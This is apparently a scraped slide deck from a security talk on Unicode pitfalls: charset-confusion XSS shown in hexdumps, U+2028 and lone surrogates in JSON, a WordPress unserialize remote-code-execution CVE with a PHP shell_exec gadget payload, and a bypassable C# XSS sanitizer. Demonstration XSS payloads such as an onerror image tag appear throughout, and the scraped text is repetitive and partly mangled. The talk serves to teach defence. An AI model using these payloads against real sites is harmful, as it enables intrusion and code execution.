    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
    00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.|
    000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
    000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0

    View Slide

  119. $ curl -sL http://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
    00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.|
    000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
    000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0
    (U+3C73 CJK UNIFIED
    IDEOGRAPH-3C73)

    View Slide

  120. $ curl -sL http://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
    00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.|
    000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
    000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0
    ᷼ (U+6372 CJK UNIFIED
    IDEOGRAPH-6372)

    View Slide

  121. $ curl -sL http://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
    00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.|
    000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
    000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0
    (U+6970 CJK UNIFIED
    IDEOGRAPH-6970)

    View Slide

  122. http://mths.be/brm

    View Slide

  123. http://mths.be/brm
    ∀scriptalert(1)/script

    View Slide

  124. http://mths.be/brm
    ∀scriptalert(1)/script

    View Slide

  125. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s|
    00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../|
    00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c

    View Slide

  126. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s|
    00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../|
    00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c

    View Slide

  127. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s|
    00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../|
    00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c
    ∀ (U+2200 FOR ALL)

    View Slide

  128. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s|
    00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../|
    00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c
    (U+3E00 CJK UNIFIED
    IDEOGRAPH-3E00)

    View Slide

  129. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s|
    00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../|
    00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c
    (U+3C00 CJK UNIFIED
    IDEOGRAPH-3C00)

    View Slide

  130. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s|
    00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../|
    00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c
    s (U+0073 LATIN SMALL
    LETTER S)

    View Slide

  131. View Slide

  132. View Slide

  133. http://mths.be/brl

    View Slide

  134. http://mths.be/brl
    OBAMA vs. ᴼᴮᴬᴹᴬ

    View Slide

  135. JavaScript vs. JSON

    View Slide

  136. <br/>// <?php echo strip($userInput); ?><br/>
    !
    /* Note:
    `strip()` strips ASCII newlines and `*/
    ?>

    View Slide

  137. http://mths.be/brn

    View Slide

  138. http://mths.be/brn

    View Slide

  139. <br/>// <?php echo strip($userInput); ?><br/>
    foo[U+2028]alert('XSS')

    View Slide

  140. <br/>// <?php echo strip($userInput); ?><br/>

    foo[U+2028]alert('XSS')

    View Slide

  141. JSON ∉ JavaScript

    View Slide

  142. var data = '"Hello\u2028"';
    // JSON-formatted data containing a string
    // containing an (unescaped!) Line Separator
    !
    eval('(' + data + ')');
    //
    i
    SyntaxError: Unexpected token ILLEGAL
    !
    JSON.parse(data);
    //
    i
    'Hello\u2028'

    View Slide

  143. Always escape JSON-formatted data
    before passing it to a JavaScript parser.
    http://mths.be/jsesc

    View Slide

  144. http://mths.be/jsesc

    View Slide

  145. var data = 'foo\u2028';
    !
    var serialized = JSON.stringify(data);
    //
    i
    '"foo\u2028"' (contains the raw, unescaped
    // Unicode symbol)
    !
    var escaped = jsesc(data, { 'json': true });
    //
    i
    '"foo\\u2028"' (contains an escape sequence
    // for the Unicode symbol
    i
    safer)
    !
    JSON.parse(serialized) == JSON.parse(escaped);
    //
    i
    true (both strings unserialize to the same value)
    http://mths.be/jsesc

    View Slide

  146. var data = 'foo\u2028';
    !
    var serialized = JSON.stringify(data);
    //
    i
    '"foo\u2028"' (contains the raw, unescaped
    // Unicode symbol)
    !
    var escaped = jsesc(data, { 'json': true });
    //
    i
    '"foo\\u2028"' (contains an escape sequence
    // for the Unicode symbol
    i
    safer)
    !
    JSON.parse(serialized) == JSON.parse(escaped);
    //
    i
    true (both strings unserialize to the same value)
    http://mths.be/jsesc

    View Slide

  147. var data = 'foo\u2028';
    !
    var serialized = JSON.stringify(data);
    //
    i
    '"foo\u2028"' (contains the raw, unescaped
    // Unicode symbol)
    !
    var escaped = jsesc(data, { 'json': true });
    //
    i
    '"foo\\u2028"' (contains an escape sequence
    // for the Unicode symbol
    i
    safer)
    !
    JSON.parse(serialized) == JSON.parse(escaped);
    //
    i
    true (both strings unserialize to the same value)
    http://mths.be/jsesc

    View Slide

  148. var string = String.fromCharCode(0xD800);
    // a string containing an (unescaped!)
    // lone surrogate
    !
    var data = JSON.stringify(string);
    // the same string as JSON-formatted data
    !
    storeInDatabaseAsUtf8(data);
    // " error/crash
    !
    sendOverWebSocketConnection(data);
    // " error/crash/DoS

    View Slide

  149. Always escape JSON-formatted data
    before passing it to a UTF-8 encoder.
    http://mths.be/jsesc

    View Slide

  150. http://mths.be/jsesc

    View Slide

  151. var data = 'foo\uD800';
    !
    var serialized = JSON.stringify(data);
    //
    i
    '"foo\uD800"' (contains the raw, unescaped
    // Unicode symbol)
    !
    var escaped = jsesc(data, { 'json': true });
    //
    i
    '"foo\\uD800"' (contains an escape sequence
    // for the Unicode symbol
    i
    safer)
    !
    JSON.parse(serialized) == JSON.parse(escaped);
    //
    i
    true (both strings unserialize to the same value)
    http://mths.be/jsesc

    View Slide

  152. var data = 'foo\uD800';
    !
    var serialized = JSON.stringify(data);
    //
    i
    '"foo\uD800"' (contains the raw, unescaped
    // Unicode symbol)
    !
    var escaped = jsesc(data, { 'json': true });
    //
    i
    '"foo\\uD800"' (contains an escape sequence
    // for the Unicode symbol
    i
    safer)
    !
    JSON.parse(serialized) == JSON.parse(escaped);
    //
    i
    true (both strings unserialize to the same value)
    http://mths.be/jsesc

    View Slide

  153. var data = 'foo\uD800';
    !
    var serialized = JSON.stringify(data);
    //
    i
    '"foo\uD800"' (contains the raw, unescaped
    // Unicode symbol)
    !
    var escaped = jsesc(data, { 'json': true });
    //
    i
    '"foo\\uD800"' (contains an escape sequence
    // for the Unicode symbol
    i
    safer)
    !
    JSON.parse(serialized) == JSON.parse(escaped);
    //
    i
    true (both strings unserialize to the same value)
    http://mths.be/jsesc

    View Slide

  154. Phabricator

    View Slide

  155. Phabricator

    View Slide

  156. View Slide

  157. View Slide

  158. View Slide

  159. uses MySQL

    View Slide

  160. uses MySQL’s ✌️utf8✌️

    View Slide

  161. View Slide

  162. View Slide

  163. http://mths.be/bro

    View Slide

  164. RCE in WordPress < 3.6.1
    http://mths.be/brq

    View Slide

  165. CVE-2013-4338
    “wp-includes/functions.php in WordPress before 3.6.1 does
    not properly determine whether data has been serialize()d,
    which allows remote attackers to execute arbitrary code by
    triggering erroneous PHP unserialize() operations.”
    http://mths.be/brq

    View Slide

  166. function is_serialized( $data ) {
    $data = trim( $data );
    $length = strlen( $data );
    $lastc = $data[$length - 1];
    if ( ';' !== $lastc && '}' !== $lastc )
    return false;
    $token = $data[0];
    switch ( $token ) {
    case 's' :
    if ( '"' !== $data[$length - 2] ) return false;
    case 'a' : case 'O' :
    return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
    case 'b' : case 'i' : case 'd' :
    return (bool) preg_match( "/^{$token}:[0-9.E-]+;\$/",
    $data );
    }
    return false;
    }
    http://mths.be/brq

    View Slide

  167. function is_serialized( $data ) {
    $data = trim( $data );
    $length = strlen( $data );
    $lastc = $data[$length - 1];
    if ( ';' !== $lastc && '}' !== $lastc )
    return false;
    $token = $data[0];
    switch ( $token ) {
    case 's' :
    if ( '"' !== $data[$length - 2] ) return false;
    case 'a' : case 'O' :
    return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
    case 'b' : case 'i' : case 'd' :
    return (bool) preg_match( "/^{$token}:[0-9.E-]+;\$/",
    $data );
    }
    return false;
    }
    http://mths.be/brq

    View Slide

  168. WordPress
    Before writing it to the database, data gets serialized
    only if it’s an array or an object, or if is_serialized($data)
    returns true (double serialization)
    !
    After retrieving data from the database, it gets unserialized
    only if is_serialized($data) returns true
    http://mths.be/brq

    View Slide

  169. WordPress
    Before writing it to the database, data gets serialized
    only if it’s an array or an object, or if is_serialized($data)
    returns true (double serialization)
    !
    After retrieving data from the database, it gets unserialized
    only if is_serialized($data) returns true
    http://mths.be/brq
    uses MySQL’s ✌️utf8✌️

    View Slide

  170. http://mths.be/brq

    View Slide

  171. http://mths.be/brq

    View Slide

  172. http://mths.be/brq

    View Slide

  173. http://mths.be/brq

    View Slide

  174. class Foo {
    private $command;
    public function setCommand($command) {
    $this->command = $command;
    }
    public function __destruct() {
    if ($this->command) {
    shell_exec($this->command);
    }
    }
    }
    !
    $object = new Foo();
    $object->setCommand('echo "pwned!" > /tmp/pwned.txt');
    $serialized = serialize($object);
    $payload = $serialized . '!';
    http://mths.be/brq

    View Slide

  175. http://mths.be/brq

    View Slide

  176. View Slide

  177. “[The following C# code] takes a provided HTML string
    and removes any potentially dangerous XSS HTML
    tags using a whitelist approach.”
    http://mths.be/brp

    View Slide

  178. private static Regex _whitelist = new Regex(@"
    ^?(a|b(lockquote)?|code|em|h(1|2|3)|i|li|ol|p(re)?|s(ub|
    up|trong|trike)?|ul)>$
    |^<(b|h)r\s?/?>$
    |^]+>$
    |^]+/?>$",
    RegexOptions.Singleline |
    RegexOptions.IgnorePatternWhitespace |
    RegexOptions.ExplicitCapture |
    RegexOptions.Compiled
    );
    http://mths.be/brp

    View Slide

  179. ///
    /// sanitize any potentially dangerous tags from the provided
    /// raw HTML input using a whitelist based approach, leaving
    /// the "safe" HTML tags
    ///
    public static string Sanitize(string html) {
    var tagname = "";
    Match tag;
    var tags = _tags.Matches(html);
    // iterate through all HTML tags in the input
    for (int i = tags.Count-1; i > -1; i--) {
    tag = tags[i];
    tagname = tag.Value.ToLower();
    if (!_whitelist.IsMatch(tagname)) {
    // not on our whitelist? I SAY GOOD DAY TO YOU, SIR. GOOD DAY!
    html = html.Remove(tag.Index, tag.Length);
    }
    http://mths.be/brp

    View Slide

  180. ///
    /// sanitize any potentially dangerous tags from the provided
    /// raw HTML input using a whitelist based approach, leaving
    /// the "safe" HTML tags
    ///
    public static string Sanitize(string html) {
    var tagname = "";
    Match tag;
    var tags = _tags.Matches(html);
    // iterate through all HTML tags in the input
    for (int i = tags.Count-1; i > -1; i--) {
    tag = tags[i];
    tagname = tag.Value.ToLower();
    if (!_whitelist.IsMatch(tagname)) {
    // not on our whitelist? I SAY GOOD DAY TO YOU, SIR. GOOD DAY!
    html = html.Remove(tag.Index, tag.Length);
    }
    http://mths.be/brp

    View Slide

  181. ///
    /// sanitize any potentially dangerous tags from the provided
    /// raw HTML input using a whitelist based approach, leaving
    /// the "safe" HTML tags
    ///
    public static string Sanitize(string html) {
    var tagname = "";
    Match tag;
    var tags = _tags.Matches(html);
    // iterate through all HTML tags in the input
    for (int i = tags.Count-1; i > -1; i--) {
    tag = tags[i];
    tagname = tag.Value.ToLower();
    if (!_whitelist.IsMatch(tagname)) {
    // not on our whitelist? I SAY GOOD DAY TO YOU, SIR. GOOD DAY!
    html = html.Remove(tag.Index, tag.Length);
    }
    http://mths.be/brp

    View Slide

  182. else if (tagname.StartsWith("// detailed tag checking
    if (!IsMatch(tagname,
    @"href=""(\#\d+|(https?|ftp)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+)""
    (\stitle=""[^""]+"")?\s?>")) {
    html = html.Remove(tag.Index, tag.Length);
    }
    }
    else if (tagname.StartsWith("// detailed tag checking
    if (!IsMatch(tagname,
    @"src=""https?://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+""
    (\swidth=""\d{1,3}"")?
    (\sheight=""\d{1,3}"")?
    (\salt=""[^""]*"")?
    http://mths.be/brp

    View Slide

  183. (\stitle=""[^""]*"")?
    \s?/?>")) {
    html = html.Remove(tag.Index, tag.Length);
    }
    }
    }
    return html;
    }
    http://mths.be/brp

    View Slide

  184. else if (tagname.StartsWith("// detailed tag checking
    if (!IsMatch(tagname,
    @"href=""(\#\d+|(https?|ftp)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+)""
    (\stitle=""[^""]+"")?\s?>")) {
    html = html.Remove(tag.Index, tag.Length);
    }
    }
    else if (tagname.StartsWith("// detailed tag checking
    if (!IsMatch(tagname,
    @"src=""https?://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+""
    (\swidth=""\d{1,3}"")?
    (\sheight=""\d{1,3}"")?
    (\salt=""[^""]*"")?
    http://mths.be/brp

    View Slide

  185. else if (tagname.StartsWith("// detailed tag checking
    if (!IsMatch(tagname,
    @"href=""(\#\d+|(https?|ftp)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+)""
    (\stitle=""[^""]+"")?\s?>")) {
    html = html.Remove(tag.Index, tag.Length);
    }
    }
    else if (tagname.StartsWith("// detailed tag checking
    if (!IsMatch(tagname,
    @"src=""https?://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+""
    (\swidth=""\d{1,3}"")?
    (\sheight=""\d{1,3}"")?
    (\salt=""[^""]*"")?
    http://mths.be/brp

    View Slide

  186. else if (tagname.StartsWith("// detailed tag checking
    if (!IsMatch(tagname,
    @"href=""(\#\d+|(https?|ftp)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+)""
    (\stitle=""[^""]+"")?\s?>")) {
    html = html.Remove(tag.Index, tag.Length);
    }
    }
    else if (tagname.StartsWith("// detailed tag checking
    if (!IsMatch(tagname,
    @"src=""https?://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+""
    (\swidth=""\d{1,3}"")?
    (\sheight=""\d{1,3}"")?
    (\salt=""[^""]*"")?
    http://mths.be/brp
    ̊
    src="404" onerror="alert('XSS')">

    View Slide

  187. else if (tagname.StartsWith("// detailed tag checking
    if (!IsMatch(tagname,
    @"href=""(\#\d+|(https?|ftp)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+)""
    (\stitle=""[^""]+"")?\s?>")) {
    html = html.Remove(tag.Index, tag.Length);
    }
    }
    else if (tagname.StartsWith("// detailed tag checking
    if (!IsMatch(tagname,
    @"src=""https?://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+""
    (\swidth=""\d{1,3}"")?
    (\sheight=""\d{1,3}"")?
    (\salt=""[^""]*"")?
    http://mths.be/brp
    ̊
    src="404" onerror="alert('XSS')">

    View Slide

  188. else if (tagname.StartsWith("// detailed tag checking
    if (!IsMatch(tagname,
    @"href=""(\#\d+|(https?|ftp)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+)""
    (\stitle=""[^""]+"")?\s?>")) {
    html = html.Remove(tag.Index, tag.Length);
    }
    }
    else if (tagname.StartsWith("// detailed tag checking
    if (!IsMatch(tagname,
    @"src=""https?://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+""
    (\swidth=""\d{1,3}"")?
    (\sheight=""\d{1,3}"")?
    (\salt=""[^""]*"")?
    http://mths.be/brp
    ̊
    src="404" onerror="alert('XSS')">
    ̊
    src="404" onerror="alert('XSS')">

    View Slide

  189. http://mths.be/brp

    View Slide

  190. TweetDeck

    View Slide

  191. View Slide

  192. View Slide

  193. View Slide

  194. function getTweetHtml(tweet) {
    var htmlEscapedTweet = htmlEscape(tweet);
    if (containsEmoji(htmlEscapedTweet)) {
    return replaceSymbolsWithImgTags(
    AccidentallyUndoHtmlEscaping(htmlEscapedTweet)
    );
    } else {
    return htmlEscapedTweet;
    }
    }
    http://mths.be/bsq

    View Slide

  195. Thanks!
    Questions? → @mathias

    View Slide

  196. View Slide

  197. http://mths.be/brr

    View Slide

  198. http://mths.be/brr

    View Slide